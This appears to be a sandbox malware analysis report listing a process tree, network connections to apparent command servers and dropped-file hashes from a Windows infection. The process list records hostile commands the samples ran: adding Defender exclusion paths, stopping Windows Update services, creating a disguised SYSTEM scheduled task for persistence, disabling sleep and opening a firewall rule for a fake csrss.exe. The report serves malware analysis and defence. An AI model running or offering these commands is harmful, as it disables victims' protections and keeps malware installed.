C:\Windows\System32\mousocoreworker.exe

C:\Windows\System32\mousocoreworker.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,15330528020477626329,18279282559588325000,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3836 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\5FCE.exe

C:\Users\Admin\AppData\Local\Temp\5FCE.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffbd66846f8,0x7ffbd6684708,0x7ffbd6684718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2212,6638207203211892535,15137315960315110335,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2656 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2212,6638207203211892535,15137315960315110335,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2212,6638207203211892535,15137315960315110335,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2224 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,6638207203211892535,15137315960315110335,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,6638207203211892535,15137315960315110335,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,6638207203211892535,15137315960315110335,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5116 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,6638207203211892535,15137315960315110335,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3192 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,6638207203211892535,15137315960315110335,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3632 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,6638207203211892535,15137315960315110335,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5324 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2212,6638207203211892535,15137315960315110335,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5592 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2212,6638207203211892535,15137315960315110335,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5592 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,6638207203211892535,15137315960315110335,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5640 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\A593.exe

C:\Users\Admin\AppData\Local\Temp\A593.exe

C:\Users\Admin\AppData\Local\Temp\A8DF.exe

C:\Users\Admin\AppData\Local\Temp\A8DF.exe

C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe

"C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\Broom.exe

C:\Users\Admin\AppData\Local\Temp\Broom.exe

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\A8DF.exe

C:\Users\Admin\AppData\Local\Temp\A8DF.exe

C:\Users\Admin\AppData\Local\Temp\forc.exe

"C:\Users\Admin\AppData\Local\Temp\forc.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Users\Admin\AppData\Local\Temp\4CB2.exe

C:\Users\Admin\AppData\Local\Temp\4CB2.exe

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\BEE5.exe

C:\Users\Admin\AppData\Local\Temp\BEE5.exe

C:\Users\Admin\AppData\Local\Temp\C2AF.exe

C:\Users\Admin\AppData\Local\Temp\C2AF.exe

C:\Users\Admin\AppData\Local\Temp\C417.exe

C:\Users\Admin\AppData\Local\Temp\C417.exe

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=C2AF.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffbd66846f8,0x7ffbd6684708,0x7ffbd6684718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,6638207203211892535,15137315960315110335,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4608 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,6638207203211892535,15137315960315110335,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1260 /prefetch:1

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=C2AF.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffbd66846f8,0x7ffbd6684708,0x7ffbd6684718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,6638207203211892535,15137315960315110335,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3988 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,6638207203211892535,15137315960315110335,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5796 /prefetch:1

Network

Country Destination Domain Proto
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 121.252.72.23.in-addr.arpa udp
US 8.8.8.8:53 198.1.85.104.in-addr.arpa udp
US 8.8.8.8:53 208.194.73.20.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 steamcommunity.com udp
US 8.8.8.8:53 www.epicgames.com udp
US 8.8.8.8:53 twitter.com udp
JP 23.207.106.113:443 steamcommunity.com tcp
US 44.197.1.250:443 www.epicgames.com tcp
US 8.8.8.8:53 113.106.207.23.in-addr.arpa udp
US 8.8.8.8:53 250.1.197.44.in-addr.arpa udp
US 104.244.42.65:443 twitter.com tcp
US 8.8.8.8:53 www.paypal.com udp
US 8.8.8.8:53 www.facebook.com udp
US 8.8.8.8:53 accounts.google.com udp
US 192.229.221.25:443 www.paypal.com tcp
NL 157.240.247.35:443 www.facebook.com tcp
US 8.8.8.8:53 store.steampowered.com udp
NL 142.251.36.45:443 accounts.google.com tcp
NL 104.85.0.101:443 store.steampowered.com tcp
US 8.8.8.8:53 65.42.244.104.in-addr.arpa udp
US 8.8.8.8:53 25.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 35.247.240.157.in-addr.arpa udp
US 8.8.8.8:53 45.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 101.0.85.104.in-addr.arpa udp
NL 142.251.36.45:443 accounts.google.com udp
US 8.8.8.8:53 93.119.177.108.in-addr.arpa udp
US 8.8.8.8:53 15.39.65.18.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 131.179.250.142.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 196.168.217.172.in-addr.arpa udp
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 8.8.8.8:53 numpersb.fun udp
US 8.8.8.8:53 killredls.pw udp
US 172.67.209.38:80 killredls.pw tcp
US 172.67.209.38:80 killredls.pw tcp
US 172.67.209.38:80 killredls.pw tcp
US 8.8.8.8:53 38.209.67.172.in-addr.arpa udp
US 172.67.209.38:80 killredls.pw tcp
US 172.67.209.38:80 killredls.pw tcp
US 8.8.8.8:53 i.ytimg.com udp
NL 216.58.214.22:443 i.ytimg.com tcp
US 172.67.209.38:80 killredls.pw tcp
US 172.67.209.38:80 killredls.pw tcp
US 8.8.8.8:53 api.twitter.com udp
US 8.8.8.8:53 abs.twimg.com udp
US 8.8.8.8:53 pbs.twimg.com udp
US 104.244.42.66:443 api.twitter.com tcp
US 8.8.8.8:53 video.twimg.com udp
NL 199.232.148.159:443 abs.twimg.com tcp
US 8.8.8.8:53 t.co udp
NL 199.232.148.159:443 abs.twimg.com tcp
US 68.232.34.217:443 video.twimg.com tcp
US 192.229.233.50:443 pbs.twimg.com tcp
US 104.244.42.133:443 t.co tcp
US 172.67.209.38:80 killredls.pw tcp
US 172.67.209.38:80 killredls.pw tcp
US 8.8.8.8:53 22.214.58.216.in-addr.arpa udp
US 8.8.8.8:53 66.42.244.104.in-addr.arpa udp
US 8.8.8.8:53 159.148.232.199.in-addr.arpa udp
US 8.8.8.8:53 217.34.232.68.in-addr.arpa udp
US 8.8.8.8:53 50.233.229.192.in-addr.arpa udp
US 8.8.8.8:53 133.42.244.104.in-addr.arpa udp
US 172.67.209.38:80 killredls.pw tcp
US 8.8.8.8:53 static.ads-twitter.com udp
NL 199.232.148.157:443 static.ads-twitter.com tcp
US 172.67.209.38:80 killredls.pw tcp
US 172.67.209.38:80 killredls.pw tcp
US 8.8.8.8:53 157.148.232.199.in-addr.arpa udp
US 172.67.209.38:80 killredls.pw tcp
US 172.67.209.38:80 killredls.pw tcp
US 8.8.8.8:53 static.xx.fbcdn.net udp
US 157.240.5.10:443 static.xx.fbcdn.net tcp
US 157.240.5.10:443 static.xx.fbcdn.net tcp
US 157.240.5.10:443 static.xx.fbcdn.net tcp
US 172.67.209.38:80 killredls.pw tcp
US 8.8.8.8:53 10.5.240.157.in-addr.arpa udp
US 172.67.209.38:80 killredls.pw tcp
RU 5.42.92.51:19057 tcp
US 172.67.209.38:80 killredls.pw tcp
US 172.67.209.38:80 killredls.pw tcp
US 172.67.209.38:80 killredls.pw tcp
US 172.67.209.38:80 killredls.pw tcp
US 8.8.8.8:53 static-assets-prod.unrealengine.com udp
US 18.239.36.22:443 static-assets-prod.unrealengine.com tcp
US 8.8.8.8:53 106.208.58.216.in-addr.arpa udp
US 8.8.8.8:53 22.36.239.18.in-addr.arpa udp
US 172.67.209.38:80 killredls.pw tcp
US 172.67.209.38:80 killredls.pw tcp
US 172.67.209.38:80 killredls.pw tcp
US 172.67.209.38:80 killredls.pw tcp
US 8.8.8.8:53 community.akamai.steamstatic.com udp
NL 23.72.252.160:443 community.akamai.steamstatic.com tcp
NL 23.72.252.160:443 community.akamai.steamstatic.com tcp
NL 23.72.252.160:443 community.akamai.steamstatic.com tcp
US 172.67.209.38:80 killredls.pw tcp
US 8.8.8.8:53 apps.identrust.com udp
NL 88.221.25.153:80 apps.identrust.com tcp
US 8.8.8.8:53 play.google.com udp
NL 142.251.36.14:443 play.google.com tcp
NL 142.251.36.14:443 play.google.com udp
US 172.67.209.38:80 killredls.pw tcp
US 172.67.209.38:80 killredls.pw tcp
US 172.67.209.38:80 killredls.pw tcp
US 172.67.209.38:80 killredls.pw tcp
US 8.8.8.8:53 160.252.72.23.in-addr.arpa udp
US 8.8.8.8:53 153.25.221.88.in-addr.arpa udp
US 8.8.8.8:53 14.36.251.142.in-addr.arpa udp
US 172.67.209.38:80 killredls.pw tcp
US 8.8.8.8:53 tracking.epicgames.com udp
US 34.195.142.151:443 tracking.epicgames.com tcp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 151.142.195.34.in-addr.arpa udp
US 8.8.8.8:53 1.202.248.87.in-addr.arpa udp
US 8.8.8.8:53 158.240.127.40.in-addr.arpa udp
US 172.67.209.38:80 killredls.pw tcp
US 8.8.8.8:53 store.akamai.steamstatic.com udp
US 172.67.209.38:80 killredls.pw tcp
NL 23.72.252.176:443 store.akamai.steamstatic.com tcp
US 172.67.209.38:80 killredls.pw tcp
US 172.67.209.38:80 killredls.pw tcp
US 172.67.209.38:80 killredls.pw tcp
US 172.67.209.38:80 killredls.pw tcp
US 172.67.209.38:80 killredls.pw tcp
US 172.67.209.38:80 killredls.pw tcp
US 172.67.209.38:80 killredls.pw tcp
US 172.67.209.38:80 killredls.pw tcp
US 8.8.8.8:53 176.252.72.23.in-addr.arpa udp
US 172.67.209.38:80 killredls.pw tcp
US 8.8.8.8:53 www.paypalobjects.com udp
NL 23.72.252.176:443 store.akamai.steamstatic.com tcp
NL 23.72.252.176:443 store.akamai.steamstatic.com tcp
US 8.8.8.8:53 facebook.com udp
US 157.240.5.35:443 facebook.com tcp
US 8.8.8.8:53 35.5.240.157.in-addr.arpa udp
US 8.8.8.8:53 fbcdn.net udp
US 157.240.5.35:443 fbcdn.net tcp
US 8.8.8.8:53 fbsbx.com udp
US 192.229.221.25:443 www.paypalobjects.com tcp
US 192.229.221.25:443 www.paypalobjects.com tcp
RU 5.42.92.190:80 5.42.92.190 tcp
NL 194.169.175.118:80 194.169.175.118 tcp
RU 5.42.65.80:80 5.42.65.80 tcp
US 8.8.8.8:53 190.92.42.5.in-addr.arpa udp
US 8.8.8.8:53 118.175.169.194.in-addr.arpa udp
US 8.8.8.8:53 80.65.42.5.in-addr.arpa udp
US 194.49.94.80:42359 tcp
US 8.8.8.8:53 80.94.49.194.in-addr.arpa udp
US 8.8.8.8:53 c.paypal.com udp
US 151.101.1.21:443 c.paypal.com tcp
US 8.8.8.8:53 21.1.101.151.in-addr.arpa udp
US 8.8.8.8:53 www.recaptcha.net udp
NL 142.250.179.163:443 www.recaptcha.net tcp
US 8.8.8.8:53 163.179.250.142.in-addr.arpa udp
RU 5.42.92.51:19057 tcp
RU 5.42.92.190:80 5.42.92.190 tcp
IT 185.196.9.161:80 185.196.9.161 tcp
US 8.8.8.8:53 161.9.196.185.in-addr.arpa udp
RU 5.42.64.16:443 tcp
US 8.8.8.8:53 16.64.42.5.in-addr.arpa udp
FI 77.91.68.247:80 77.91.68.247 tcp
US 8.8.8.8:53 247.68.91.77.in-addr.arpa udp
RU 5.42.92.51:19057 tcp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
RU 5.42.92.190:80 5.42.92.190 tcp
RU 5.42.64.16:443 tcp
RU 5.42.92.51:19057 tcp
US 8.8.8.8:53 bluepablo.fun udp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 8.8.8.8:53 41.18.21.104.in-addr.arpa udp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 8.8.8.8:53 host-file-host6.com udp
US 8.8.8.8:53 host-host-file8.com udp
US 95.214.26.28:80 host-host-file8.com tcp
US 8.8.8.8:53 28.26.214.95.in-addr.arpa udp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
RU 5.42.92.190:80 5.42.92.190 tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 194.49.94.72:80 194.49.94.72 tcp
US 104.21.18.41:80 bluepablo.fun tcp
RU 5.42.92.51:19057 tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 8.8.8.8:53 72.94.49.194.in-addr.arpa udp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 194.49.94.11:80 194.49.94.11 tcp
US 8.8.8.8:53 11.94.49.194.in-addr.arpa udp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 8.8.8.8:53 18.173.189.20.in-addr.arpa udp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 8.8.8.8:53 learn.microsoft.com udp
NL 104.85.2.139:443 learn.microsoft.com tcp
US 8.8.8.8:53 183.2.85.104.in-addr.arpa udp
US 8.8.8.8:53 wcpstatic.microsoft.com udp
US 13.107.246.67:443 wcpstatic.microsoft.com tcp
US 8.8.8.8:53 js.monitor.azure.com udp
US 13.107.246.67:443 js.monitor.azure.com tcp
US 8.8.8.8:53 mscom.demdex.net udp
IE 52.211.35.76:443 mscom.demdex.net tcp
US 8.8.8.8:53 target.microsoft.com udp
US 8.8.8.8:53 microsoftmscompoc.tt.omtrdc.net udp
US 8.8.8.8:53 139.2.85.104.in-addr.arpa udp
US 8.8.8.8:53 67.246.107.13.in-addr.arpa udp
US 8.8.8.8:53 76.35.211.52.in-addr.arpa udp
US 8.8.8.8:53 api.ip.sb udp
US 104.26.13.31:443 api.ip.sb tcp
US 8.8.8.8:53 31.13.26.104.in-addr.arpa udp
US 8.8.8.8:53 browser.events.data.microsoft.com udp
FR 40.79.141.152:443 browser.events.data.microsoft.com tcp
FR 40.79.141.152:443 browser.events.data.microsoft.com tcp
US 8.8.8.8:53 152.141.79.40.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ZJ1Rn98.exe

MD5 6fc09055e0386eb267c9daa5d39e041a
SHA1 8ce5a404e7f3bb310250691cdb75a0290eaff417
SHA256 c458a00ec121bf75c42a4d7a069c7ef799e39c66576b39d624c51c11a8380fb7
SHA512 b15a0347bed09c19aed84338db56afbc762ae0c1294ec46e300483429b77400292d291c22c9ea228cf01fc7ee0d8d0edd8de6a7f6450e906ec08e6fbd2ac1588

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ZJ1Rn98.exe

MD5 6fc09055e0386eb267c9daa5d39e041a
SHA1 8ce5a404e7f3bb310250691cdb75a0290eaff417
SHA256 c458a00ec121bf75c42a4d7a069c7ef799e39c66576b39d624c51c11a8380fb7
SHA512 b15a0347bed09c19aed84338db56afbc762ae0c1294ec46e300483429b77400292d291c22c9ea228cf01fc7ee0d8d0edd8de6a7f6450e906ec08e6fbd2ac1588

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\fI3fF09.exe

